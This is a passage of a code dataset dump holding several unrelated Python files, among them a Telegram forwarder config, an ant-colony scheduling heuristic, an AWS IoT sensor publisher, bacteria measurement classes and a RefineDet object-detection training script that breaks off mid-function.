where your application logic begins\n \"\"\"\n\n def __init__(self):\n super().__init__(service_name, service_key, service_version, loadables, config_path, configs, dev_mode)\n\n def fastapi_routers(self):\n self.fastapi_driver.instance.include_router(\n auth.router,\n prefix=\"/auth\",\n tags=[\"auth\"],\n responses={404: {\"description\": \"Not found\"}},\n )\n\n def post_load(self):\n logger = LoggingService(State.rabbitmq.connection_details, service_name)\n State.services['logger'] = logger\n","sub_path":"src/service_bootstrap.py","file_name":"service_bootstrap.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"535729650","text":"from os import path, getenv\nfrom dotenv import load_dotenv\n\nload_dotenv()\n__dirname = path.dirname(__file__)\n\n\"\"\" client settings \"\"\"\n__lib = \"lib/tdjson.dll\" # your tdjson .so or .dll file (depending on your OS)\nCLIENT = {\n \"use_test_dc\": False,\n \"tdlib_path\": path.join(__dirname, __lib),\n \"wait_timeout\": 1, # second/s\n \"database_directory\": \"tdlib\",\n \"use_file_database\": False,\n \"use_chat_info_database\": False,\n \"use_message_database\": False,\n \"use_secret_chats\": True,\n \"api_id\": int(getenv(\"API_ID\")), # your API_ID\n \"api_hash\": str(getenv(\"API_HASH\")), # your API_HASH\n \"system_language\": \"en\",\n \"device_model\": \"Desktop\",\n \"app_version\": \"1.2\",\n \"enable_storage_optimizer\": True,\n \"group_messages\": False, # group media messages or not\n}\n\n\"\"\" forwarder settings \"\"\"\nFORWARDER = {\n \"limit_chats\": 10000,\n \"periodicity_fwd\": 1, # second/s\n \"log_path\": path.join(__dirname, \"log\\\\app.log\"),\n \"rules_path\": path.join(__dirname, \"rules.json\"),\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"545400225","text":"import numpy as np\r\nfrom matplotlib import pyplot\r\n\r\ndata = np.loadtxt('Book1.csv', delimiter=',')\r\npeak = np.zeros((1,2))\r\nflag = True\r\n# for i in range(100000):\r\nfor i in range(len(data[:,0])):\r\n if(data[i][1] > 50000 and data[i][1]-data[i-1][1] < 0 and flag == True):\r\n peak = np.append(peak,np.array([[data[i][1],data[i][2]]]), axis=0)\r\n flag = False\r\n elif(data[i][1] > 50000 and data[i][1]-data[i-1][1] > 0 and flag == False):\r\n flag = True\r\n\r\npeak_all = np.delete(peak, 0, 0)\r\na = len(peak_all[:,0])\r\nprint(a)\r\nrri = np.zeros((1,2))\r\nfor i in range(len(peak_all[:,0])-1):\r\n rri = np.append(rri,np.array([[peak_all[i+1][0],peak_all[i+1][0]-peak_all[i][0]]]), axis=0)\r\n\r\nrri_all = np.delete(rri, 0, 0)\r\n# print(rri_all)\r\nfreq = np.linspace(0, 1/1.1, len(rri_all[:,0]))\r\nF = np.fft.fft(rri_all[:,1])\r\nAmp = np.abs(F)\r\n# print(freq)\r\npyplot.plot(freq, Amp)\r\npyplot.xlim(0,0.5)\r\npyplot.ylim(0,10)\r\n# pyplot.plot(rri_all[:,0], rri_all[:,1])\r\npyplot.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"342363131","text":"import random\nimport json\nimport copy\nimport time\nimport CrearMapa\nimport CrearEscenario\nimport numpy\nimport winsound\n\n\ndef darProbabilidad(matriz, tiempo, nodoActual, feromonas, alpha, beta, habOrdenes, habEmpleados, q):\n\n probabilidad = []\n vector = []\n\n for i in range(len(matriz)):\n if (matriz[nodoActual][i] != 0):\n\n #Una orden solo puede ser antendida por un empleado con un minimo de habilidades\n if(sum(numpy.array(habOrdenes[i]) * numpy.array(habEmpleados)) >= q * sum(numpy.array(habOrdenes[i]))):\n vector.append(round(beta / matriz[nodoActual][i] + alpha * feromonas[nodoActual][i], 2))\n else:\n vector.append(0)\n else:\n vector.append(0)\n\n vector[0] = 0\n\n suma = sum(vector)\n if(suma == 0):\n return probabilidad\n\n #Calcular probabilidades\n for i in range(len(matriz)):\n if matriz[nodoActual][i] == 0:\n if len(probabilidad) > 0:\n probabilidad.append(probabilidad[i - 1])\n else:\n probabilidad.append(0)\n else:\n if (matriz[nodoActual][i] + matriz[i][0]) < tiempo:\n if len(probabilidad) > 0:\n probabilidad.append(vector[i] / suma + probabilidad[i - 1])\n else:\n probabilidad.append(vector[i] / suma)\n else:\n if len(probabilidad) > 0:\n\n probabilidad.append(probabilidad[i - 1])\n else:\n probabilidad.append(0)\n return probabilidad\n\n\ndef borrarNodo(nodoActual, matriz):\n for i in range(len(matriz)):\n matriz[i][nodoActual] = 0\n return matriz\n\n\ndef actualizarFeromonas(secuencia, valorsecuencias, feromonas, rho):\n deltaFeromonas = []\n\n #Inicializar delta feromonas\n for i in range(len(feromonas)):\n deltaFeromonas.append(numpy.repeat(0, len(feromonas)).tolist())\n\n #Calcular delta feromonas\n for i in range(len(secuencia)):\n for j in range(len(secuencia[i]) - 1):\n deltaFeromonas[secuencia[i][j]][secuencia[i][j + 1]] += valorsecuencias[i]\n\n #Retorna feromonas con evaporación\n return (numpy.array(deltaFeromonas) + numpy.array(feromonas)) * rho\n\n\ndef heuristica(iteraciones, hormigas):\n #CrearEscenario.crearEscenario(6, 230, 4)\n CrearEscenario.crearEscenario(2, 16, 2, 0.05)\n\n # Guardar tiempo inicial\n timerGeneralInicial = time.time()\n\n #Parametros metaheuristica\n alpha = 1\n beta = 5\n rho = 0.5\n #iteraciones = 50\n #hormigas = 50\n\n #Leer archivos json\n with open('Escenario.json') as file:\n data = json.load(file)\n tiempoDesplazamiento = data['tiempoDesplazamiento']\n tiempoAtencion = data['tiempoAtencion']\n tiempoD = data['horasTrabajo']\n numEmpleados = data['numEmpleados']\n numDias = data['numDiasOperacion']\n habEmp = data['habilidadesOperarios']\n habOrde = data['habilidadesOrdenes']\n qParametro = data['porcentajeCumplimientoHabilidades']\n prioridad = data['prioridad']\n costoAns = data['costosANS']\n maxDia = data['maxDia']\n\n\n #Calcular tiempo total\n tiempoTotal = []\n for i in range(len(tiempoDesplazamiento)):\n vectorActual = []\n for j in range(len(tiempoDesplazamiento)):\n if (tiempoDesplazamiento[i][j] != 0):\n vectorActual.append(round(tiempoDesplazamiento[i][j] + tiempoAtencion[j],2))\n else:\n vectorActual.append(0)\n tiempoTotal.append(vectorActual)\n\n\n #Inicializar feromonas\n feromonas = []\n for i in range(len(tiempoDesplazamiento)):\n feromonas.append(numpy.repeat(1, len(tiempoDesplazamiento)).tolist())\n\n\n #Inicializar respuesta\n secuenciaM = []\n valorSecuenciaMax= 0\n\n #Inicio de metaheuristica\n for j in range(iteraciones):\n #Secuencias de iteración\n secuencias = []\n valorSecuencias = []\n for i in range(hormigas):\n\n #Reiniciar hormiga\n tiempo = copy.deepcopy(tiempoTotal)\n secuencia = []\n\n valorSecuencia = 0\n for dias in range(numDias):\n\n #Auxiliar minMax\n minMax = 999\n for emp in range(numEmpleados):\n\n #Reiniciar variables\n habilidadesEmpleado = habEmp[emp]\n tiempoDisponible = tiempoD[emp][dias]\n vacio = True\n ordenes = 0\n\n #En cada recorrido inicio en el nodo 0\n nodoActual = 0\n\n\n while (vacio or nodoActual != 0):\n probabilidad = darProbabilidad(tiempo, tiempoDisponible, nodoActual, feromonas, alpha, beta,\n habOrde, habilidadesEmpleado, qParametro)\n\n #Determinar nodo a ir\n aleatorio = random.random()\n contador = 0\n\n while contador < len(probabilidad) and aleatorio > probabilidad[contador]:\n contador += 1\n\n #Probabilidad volver a orden 0\n if(len(probabilidad)) > 1:\n if (probabilidad[len(probabilidad) - 1] < aleatorio):\n contador = 0\n\n #Actualizo valores\n tiempoDisponible -= tiempo[nodoActual][contador]\n\n valorSecuencia += 1/(tiempo[nodoActual][contador]+1)\n nodoActual = contador\n\n\n\n #Actualizar valor de la secuencia\n if(nodoActual!=0):\n valorSecuencia += prioridad[nodoActual]\n ordenes += 1\n if(maxDia[nodoActual] < dias):\n valorSecuencia -= (dias - maxDia[nodoActual]) * costoAns[nodoActual] * prioridad[nodoActual]\n\n\n secuencia.append(nodoActual)\n vacio = False\n\n #Un nodo no se visita dos veces\n if(nodoActual!=0):\n tiempo = borrarNodo(nodoActual, tiempo)\n\n if(ordenes < minMax):\n minMax = ordenes\n valorSecuencia += (minMax + 1) * 0.05\n\n #Guardar mejor secuencia\n if valorSecuencia > valorSecuenciaMax:\n secuenciaM = secuencia\n valorSecuenciaMax = valorSecuencia\n\n\n secuencias.append(secuencia)\n valorSecuencias.append(valorSecuencia)\n\n #Actualiza feromonas\n feromonas = actualizarFeromonas(secuencias, valorSecuencias, feromonas, rho)\n\n ordenesMapa = []\n ordenesMapa.append(0)\n for i in secuenciaM:\n ordenesMapa.append(i)\n ordenesMapa.append(i)\n print(ordenesMapa)\n CrearMapa.crearMapa(ordenesMapa)\n\n print(\"La mejor secuencia es\")\n print(secuenciaM)\n print(\"Se pudieron atender \" + str(len(secuenciaM) - (numDias * numEmpleados)) + \" ordenes de \" + str(\n len(habOrde) - 1))\n timerGeneralFinal = time.time()\n timerGeneral = timerGeneralFinal - timerGeneralInicial\n print(\"La función objetivo tiene un valor de: \" + str(valorSecuenciaMax))\n print(\"Tiempo de ejecución total: \" + str(round(timerGeneral, 2)) + \" segundos\")\n\n f = open('escalabilidad.txt', 'a')\n f.write('\\n' + \"Heuristica\")\n f.write('\\n' + str(valorSecuenciaMax))\n f.write('\\t' + str(len(secuenciaM) - (numDias * numEmpleados)))\n f.write('\\t' + str(round(timerGeneral, 2)))\n f.close()\n\n '''\n while True:\n duration = 1000 # milliseconds\n freq = 440 # Hz\n winsound.Beep(freq, duration)\n '''\n\n\n\nheuristica(100,100)","sub_path":"tesis/Heuristica.py","file_name":"Heuristica.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20722707","text":"#######\n# Log #\n#######\n\n'''\nSetting up the logging system. It's really simple to use.\nIncluding these lines at the top of the file you want to log should suffice:\n\n>>> import logging\n>>> import logging.config\n>>>\n>>> # Importing the default configuration\n>>> from ..logger import LOGGING_CONFIG\n>>>\n>>> # Creating logger and setting up the configuration\n>>> logging.config.dictConfig(LOGGING_CONFIG)\n>>> LOGGER = logging.getLogger(__name__)\n'''\n\nimport os\n\nLOG_DIR = os.path.dirname(os.path.realpath(__file__))\nGHOST_LOG = os.path.join(LOG_DIR, 'ghost.log')\n\ntry:\n open(GHOST_LOG, 'r')\nexcept IOError:\n open(GHOST_LOG, 'w')\n\nLOGGING_CONFIG = {\n 'version': 1, # inserting logfile on this version\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(asctime)s;%(levelname)-1s;'\n '%(name)s;%(funcName)s(%(lineno)d);%(message)s'\n },\n \"terminal\": {\n \"format\": \"%(asctime)s %(levelname)-1s %(name)s:%(message)s\"\n },\n },\n 'handlers': {\n 'screen': {\n 'class': 'logging.StreamHandler',\n 'level': 'INFO',\n 'stream': 'ext://sys.stdout',\n 'formatter': 'terminal'\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'level': 'DEBUG',\n 'filename': GHOST_LOG,\n 'formatter': 'verbose'\n }\n },\n 'loggers': {\n 'neural_network': {\n 'level': 'DEBUG',\n 'handlers': ['screen', 'file'],\n 'propagate': 'no'\n },\n 'statistics': {\n 'level': 'DEBUG',\n 'handlers': ['screen', 'file'],\n 'propagate': 'no'\n }\n },\n \"root\": {\n \"level\": \"DEBUG\",\n \"handlers\": ['screen', 'file']\n }\n}\n","sub_path":"arcedosml/logger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647959546","text":"########################################################################################################################\n# #\n# MIT License #\n# #\n# Copyright (c) 2018 Telefonica R&D #\n# #\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated #\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the #\n# rights in the Software without restriction, including without limitation the rights o use, copy, modify, merge, #\n# publish, to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and #\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions: #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO #\n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.#\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN #\n# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER #\n# DEALINGS IN THE SOFTWARE. #\n# #\n########################################################################################################################\nfrom __future__ import print_function\nfrom sense_hat import SenseHat\nimport paho.mqtt.client as mqtt\nimport sys, traceback\nimport json\nimport ssl\nimport yaml\nimport time\n\ndef on_message(mqttc, userdata, message):\n data_delta = str(message.payload.decode(\"utf-8\"))\n json_delta = json.loads(data_delta)\n print(\"Received message:\")\n print(data_delta)\n return 0\n\ndef ssl_alpn_AWS(config_cloud):\n try:\n ssl_context = ssl.create_default_context()\n ssl_context.set_alpn_protocols([\"x-amzn-mqtt-ca\"])\n ca = \"cert/AmazonRootCA1.pem\"\n cert = \"cert/certificate_pem.pem.crt\"\n private = \"cert/PrivateKey.pem.key\"\n ssl_context.load_verify_locations(cafile=ca)\n ssl_context.load_cert_chain(certfile=cert, keyfile=private)\n print(\"ssl context created:\")\n return ssl_context\n\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n\n\ndef cloud_connector_AWS(config_cloud):\n try:\n mqttc = mqtt.Client()\n ssl_context = ssl_alpn_AWS(config_cloud)\n mqttc.tls_set_context(context=ssl_context)\n broker = config_cloud[\"broker\"]\n mqttc.connect(broker, port=8883)\n\n # Assign event callbacks\n mqttc.on_message = on_message\n\n # Subscribe to topic\n\n\n # Start\n mqttc.loop_start()\n print(\"MQTT broker connected:\")\n\n return mqttc\n\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n\nif __name__== \"__main__\":\n try:\n\n with open('AWS_configuration.yaml', 'r') as f:\n config_cloud = yaml.load(f)\n f.close()\n sense = SenseHat()\n connection = cloud_connector_AWS(config_cloud)\n\n json_reported = {\"state\": {\"reported\": {}}}\n json_reported[\"state\"][\"reported\"] = {}\n\n while True:\n\n json_reported[\"state\"][\"reported\"][\"temperature\"] = sense.get_temperature()\n json_reported[\"state\"][\"reported\"][\"humidity\"] = sense.get_humidity()\n json_reported[\"state\"][\"reported\"][\"pressure\"] = sense.get_pressure()\n json_reported[\"state\"][\"reported\"][\"accelerometer\"] = sense.get_accelerometer_raw()\n json_reported[\"state\"][\"reported\"][\"orientation\"] = sense.get_orientation()\n json_reported[\"state\"][\"reported\"][\"compass\"] = sense.get_compass()\n\n msg_reported = json.dumps(json_reported)\n topic = \"$aws/things/\" + config_cloud[\"thing\"] + \"/shadow/update\"\n connection.publish(topic, msg_reported)\n print(\"msg published:\")\n time.sleep(20)\n\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n\n","sub_path":"scripts/Raspberry1Click/cloud/aws/AWS_publish.py","file_name":"AWS_publish.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163069964","text":"\"\"\"\nA custom class to contain the bacteria measurements\n\"\"\"\n\n\nclass BacteriaData():\n \"\"\"\n A class that containts all the data for all the bacteria\n\n Attributes\n ------\n bacteria : dictionary\n A dictionary where the key is the bacteria number and the\n value is an instance of an `IndividualBacteria` containing\n its respective information\n \"\"\"\n def __init__(self):\n self.bacteria = {}\n\n def add_bac_data(\n self, bac_num, bacteria_lineage, region, tpoint, well_label=None):\n \"\"\"\n Creates a new instance of the IndividualBacteria class for a new\n bacteria, or updates it if it already exists\n\n Parameters\n ------\n bac_num : int\n The bacteria number that links to the unique label of the bacteria\n bacteria_lineage : dictionary\n A dictionary that links the physical unique label of a bacteria\n to one which shows information on its lineage\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n tpoint : int\n The timepoint for the measurement\n \"\"\"\n # checks to see if the bacteria exists, adds data if it does and\n # records the timepoint\n if bac_num not in self.bacteria.keys():\n self.bacteria[bac_num] = IndividualBacteria(bac_num)\n self.bacteria[bac_num].add_string(bacteria_lineage[bac_num])\n self.bacteria[bac_num].well_label = well_label\n self.bacteria[region.label].add_bf_values(region, tpoint)\n\n def measure_fluo(self, region, fluorescence_data, bkg_values, timepoint):\n \"\"\"\n Adds fluorescent data for a bacteria\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n fluorescence_data : ndarray\n Array containing all the original fluorescent data (2D\n if just one frame)\n bkg_values : tuple\n tuple in the format (background fluorescence, background\n SEM) for the\n respective image\n timepoint : int\n The timepoint for the measurement\n \"\"\"\n # adds fluorescence measurements\n self.bacteria[region.label].add_fluo_values(\n region, fluorescence_data, bkg_values, timepoint)\n\n def compile_results(self, max_tpoint=0):\n \"\"\"\n Compiles all of the measurements\n\n Parameters\n ------\n max_tpoint : int\n The last timepoint for the measurements\n \"\"\"\n # compiles the results for each bacteria into a simple list\n # which can easily be written to a CSV\n for bac in self.bacteria.values():\n bac.compile_data(max_tpoint)\n\n\nclass IndividualBacteria():\n \"\"\"\n A custom class which contains all the required information for\n an individual bacterium\n\n Attributes\n ------\n bacteria_number : int\n The unique number of the bactera\n bacteria_label : str\n The unique label with the bacterias lineage information\n well_label : int\n Integer identifying the well the bacteria belongs to\n bf_measurements : dictionary\n The keys (\"Area\",\"Width\",\"Length\") can be used to access chronological\n lists of these measurements\n raw_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the raw fluorescence values\n actual_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the background subtracted fluorescence values\n integrated_fluorescence : dictionary\n Keys are a tuple (timepoint, fluorescence channel) which can be used\n to access the integrated (actual x area) fluorescence values\n headings_line : list\n A list of the types of measurments, repeated for each timepoint,\n that can easily be written to a csv\n measurements_output : list\n A list of the measurments, repeated for each timepoint,\n that can easily be written to a csv\n timepoints : list\n A list of the timepoints that information is held for\n num_fluo : int\n The number of fluorescent channels information is held for\n \"\"\"\n\n def __init__(self, bac_num):\n self.bacteria_number = bac_num\n self.bacteria_label = None\n self.well_label = None\n self.bf_measurements = {\n \"Area\": [],\n \"Width\": [],\n \"Length\": [],\n }\n self.raw_fluorescence = {}\n self.actual_fluorescence = {}\n self.integrated_fluorescence = {}\n self.headings_line = []\n self.measurements_output = []\n self.timepoints = []\n self.num_fluo = 0\n\n def add_string(self, label):\n \"\"\"\n Adds a readable label\n\n Parameters\n ------\n Label : str\n The label to be added\n \"\"\"\n self.bacteria_label = label\n\n def add_bf_values(self, region, tpoint):\n \"\"\"\n Updates the brightfield information\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n tpoint : int\n The timepoint the data corresponds to\n \"\"\"\n self.bf_measurements[\"Area\"].append(region.area)\n self.bf_measurements[\"Width\"].append(region.minor_axis_length)\n self.bf_measurements[\"Length\"].append(region.major_axis_length)\n self.timepoints.append(tpoint)\n\n def add_fluo_values(self, region, fluorescence_data,\n bkg_values, timepoint):\n \"\"\"\n Updates the fluorescence information\n\n Parameters\n ------\n region : list of RegionProperties\n Each item describes one labeled region, and can be accessed\n using the attributes listed below\n fluorescence_data : ndarray\n Array containing all the original fluorescent data (2D if\n just one frame)\n bkg_values : tuple\n tuple in the format (background fluorescence, background\n SEM) for the respective image\n timepoint : int\n The timepoint the data corresponds to\n \"\"\"\n self.num_fluo = len(fluorescence_data)\n import mmhelper.measurements as mmeas\n for num, (fluo_im, bkg) in enumerate(\n zip(fluorescence_data, bkg_values)):\n fluo, fluo_bg, int_fluo = mmeas.fluorescence_measurements(\n region, fluo_im, bkg)\n self.raw_fluorescence[(timepoint, num)] = fluo\n self.actual_fluorescence[(timepoint, num)] = fluo_bg\n self.integrated_fluorescence[(timepoint, num)] = int_fluo\n\n def compile_data(self, max_tpoint):\n \"\"\"\n Compiles all of the data into a readable output\n\n Parameters\n ------\n max_tpoint : int\n The final timepoint for the analysis\n \"\"\"\n if not self.raw_fluorescence:\n fluo_values = 0\n else:\n fluo_values = 3\n missed_detection = self.set_missed_detection_line(\n fluo_values=fluo_values)\n data_line = []\n for tindex in range(0, max_tpoint):\n data_line.append([self.well_label])\n data_line.append([self.bacteria_label])\n if tindex not in self.timepoints:\n data_line.append(missed_detection)\n continue\n bf_data_index = self.timepoints.index(tindex)\n data_line.append([self.bf_measurements[key][bf_data_index]\n for key in sorted(self.bf_measurements.keys())])\n for num in range(0, self.num_fluo):\n data_line.append([self.raw_fluorescence[(tindex, num)],\n self.actual_fluorescence[(tindex, num)],\n self.integrated_fluorescence[(tindex, num)]])\n self.set_heading_line(max_tpoint)\n self.measurements_output = [\n item for sublist in data_line for item in sublist]\n\n # Fluo_values is the number of measurements from each fluo image\n def set_missed_detection_line(self, fluo_values=3):\n \"\"\"\n Creates a line of hyphens that will be used if the detection is misssed\n\n Parameters\n ------\n fluo_values : int\n The number of fluorescent measurements that are included\n in the results\n \"\"\"\n return ([\"-\"] * (len(self.bf_measurements) +\n (self.num_fluo * fluo_values)))\n\n def set_lysed_bacteria_line(self, fluo_values=3):\n \"\"\"\n Creates a line of 0's that will be used if the bacteria has lysed\n\n Parameters\n ------\n fluo_values : int\n The number of fluorescent measurements that are included\n in the results\n \"\"\"\n return ([0] * (len(self.bf_measurements) +\n (self.num_fluo * fluo_values)))\n\n def set_heading_line(self, max_tpoint):\n \"\"\"\n Sets the heading line that will be used at the top of the\n measurements CSV\n\n Parameters\n ------\n max_tpoint : int\n The final timepoint for the analysis\n \"\"\"\n headings = [[\"well label\",\n \"lineage\",\n \"area\",\n \"length\",\n \"width\"],\n ([\"raw_fluorescence\",\n \"fluorescence\",\n \"integrated_fluorescence\"] * self.num_fluo)]\n headings = [\n [item for sublist in headings for item in sublist] * max_tpoint]\n self.headings_line = [item for sublist in headings for item in sublist]\n","sub_path":"mmhelper/measurements_class.py","file_name":"measurements_class.py","file_ext":"py","file_size_in_byte":9987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"279380096","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.log import enable_pretty_logging\nfrom tornado.web import Application\n\nfrom concurrent.futures import ThreadPoolExecutor\n\nfrom api.utils.db import get_db_session\nfrom api.utils.settings import get_normalized_settings\nfrom api.v1_0.handlers.urls import APIUrls\n\n\nclass TenantApplication(Application):\n\n def __init__(self, handlers, **settings):\n Application.__init__(self, handlers, **settings)\n self.db = get_db_session(settings)\n self.thread_pool = ThreadPoolExecutor(5)\n\n\nif __name__ == \"__main__\":\n loop = IOLoop.instance()\n settings = get_normalized_settings()\n application = TenantApplication(handlers=APIUrls, **settings)\n\n if settings['debug']:\n enable_pretty_logging()\n application.listen(\n settings['bind_port'],\n settings['bind_addr'],\n )\n else:\n server = HTTPServer(application)\n server.bind(\n settings['bind_port'],\n settings['bind_addr']\n )\n server.start(settings['tornado_start'])\n\n loop.start()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393153620","text":"import os, sys, time\nimport json\nimport pickle\nimport argparse\nimport random\n\nimport numpy as np\nfrom PIL import Image, ImageFile\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nimport torch.nn.init as init\n\nimport torchvision.transforms as transforms\n\n#from data import *\nfrom layers.modules import RefineDetMultiBoxLoss\nfrom models.refinedet import build_refinedet\n#from utils.logging import Logger\n#from utils.augmentations import SSDAugmentation\nfrom utilsdet.datagen import RefineListDataset\n\n\nparser = argparse.ArgumentParser(\n description='Single Shot MultiBox Detector Training With Pytorch')\ntrain_set = parser.add_mutually_exclusive_group()\nparser.add_argument('--input_size', default='512', choices=['320', '512'],\n type=str, help='RefineDet320 or RefineDet512')\nparser.add_argument('--basenet', default='./weights/vgg16_reducedfc.pth',\n help='Pretrained base model')\nparser.add_argument('--batch_size', default=64, type=int,\n help='Batch size for training')\nparser.add_argument('--epoch', default=300, type=int)\nparser.add_argument('--resume', default=None, type=str,\n help='Checkpoint state_dict file to resume training from')\nparser.add_argument('--start_iter', default=0, type=int,\n help='Resume training at this iter')\nparser.add_argument('--num_workers', default=0, type=int,\n help='Number of workers used in dataloading')\nparser.add_argument('--seed', default=1, type=int,\n help='Random state')\nparser.add_argument('--cuda', default=True, type=bool,\n help='Use CUDA to train model')\nparser.add_argument('--lr', '--learning-rate', default=1e-3, type=float,\n help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float,\n help='Momentum value for optim')\nparser.add_argument('--weight_decay', default=5e-4, type=float,\n help='Weight decay for SGD')\nparser.add_argument('--gamma', default=0.1, type=float,\n help='Gamma update for SGD')\nparser.add_argument('--save_folder', default='results/refinedet',\n help='Directory for saving checkpoint models')\nargs = parser.parse_args()\n\n\n#sys.stdout = Logger(os.path.join(args.save_folder, 'log.txt'))\n\ndef load_image(index):\n Image.MAX_IMAGE_PIXELS = 10000000000\n ImageFile.LOAD_TRUNCATED_IMAGES = True\n image_name = f\"source/train_images/train_{index:0>2}.jpg\"\n img = Image.open(image_name)\n return img\n\n\ndef load_labels(index):\n pos = []\n with open(f\"data/det_label/train_{index:0>2}_grid_step128_256_0.9.p\", \"rb\") as f:\n pos_labels, _ = pickle.load(f)\n pos.extend(pos_labels)\n with open(f\"data/det_label/train_{index:0>2}_grid_step96_192_0.9.p\", \"rb\") as f:\n pos_labels, _ = pickle.load(f)\n pos.extend(pos_labels)\n #with open(f\"data/det_label/train_{index:0>2}_grid_step64_128_0.9.p\", \"rb\") as f:\n # pos_labels, _ = pickle.load(f)\n #pos.extend(pos_labels)\n return pos\n\n\ndef main():\n cfg = {\"casename\":f\"refinedet_2_union2(0.9)_256\",\n 'min_dim':512,\n 'num_classes':3+1,\n 'in_size':256,\n 'lr_steps':(80000, 100000, 120000)}\n\n assert torch.cuda.is_available()\n\n if not os.path.exists(args.save_folder):\n os.mkdir(args.save_folder)\n\n seed = args.seed\n random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(seed)\n\n # Data\n print('Loading the dataset...')\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.485,0.456,0.406), (0.229,0.224,0.225))\n ])\n\n trainset = RefineListDataset(np.arange(18), transform, cfg['in_size'], train=True)\n validset = RefineListDataset(np.arange(18,20), transform, cfg['in_size'], train=False)\n\n num_workers = 0\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=num_workers, collate_fn=trainset.collate_fn)\n validloader = torch.utils.data.DataLoader(validset, batch_size=args.batch_size, shuffle=False, num_workers=num_workers, collate_fn=validset.collate_fn)\n\n print(f\"trainset_size:{len(trainset)}, trainloader_size:{len(trainloader)}\")\n print(f\"validset_size:{len(validset)}, validloader_size:{len(validloader)}\")\n\n # build model\n refinedet_net = build_refinedet('train', cfg['min_dim'], cfg['num_classes'])\n if args.cuda:\n net = torch.nn.DataParallel(refinedet_net)\n cudnn.benchmark = True\n else:\n net = refinedet_net\n\n optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=False)\n\n casename = cfg[\"casename\"]\n if args.resume:\n print('Resuming training, loading {}...'.format(args.resume))\n checkpoint = torch.load(args.resume)\n net.load_state_dict(checkpoint[\"net\"])\n optimizer.load_state_dict(checkpoint[\"optimizer\"])\n start_epoch = checkpoint[\"epoch\"] + 1\n with open(f'./results/{casename}/log', \"r\") as f:\n logs = json.load(f)\n else:\n #vgg_weights = torch.load(args.save_folder + args.basenet)\n vgg_weights = torch.load(args.basenet)\n print('Loading base network...')\n refinedet_net.vgg.load_state_dict(vgg_weights)\n start_epoch = 0\n logs = []\n if os.path.exists(f\"./results/{casename}/log\"):\n key = input(\"Found log file. continue? [y] \")\n if key == \"y\":\n pass\n else:\n assert False, f\"found log file [results/{casename}/log]\"\n\n # Device\n gpu_id = 0\n device = torch.device(f\"cuda:{gpu_id}\")\n net = net.to(device)\n\n if not args.resume:\n print('Initializing weights...')\n # initialize newly added layers' weights with xavier method\n refinedet_net.extras.apply(weights_init)\n refinedet_net.arm_loc.apply(weights_init)\n refinedet_net.arm_conf.apply(weights_init)\n refinedet_net.odm_loc.apply(weights_init)\n refinedet_net.odm_conf.apply(weights_init)\n #refinedet_net.tcb.apply(weights_init)\n refinedet_net.tcb0.apply(weights_init)\n refinedet_net.tcb1.apply(weights_init)\n refinedet_net.tcb2.apply(weights_init)\n\n arm_criterion = RefineDetMultiBoxLoss(2, 0.5, True, 0, True, 3, 0.5,\n False, device)\n odm_criterion = RefineDetMultiBoxLoss(cfg['num_classes'], 0.5, True, 0, True, 3, 0.5,\n False, device, use_ARM=True)\n\n global g_n_iter\n global step_index\n g_n_iter = 0\n 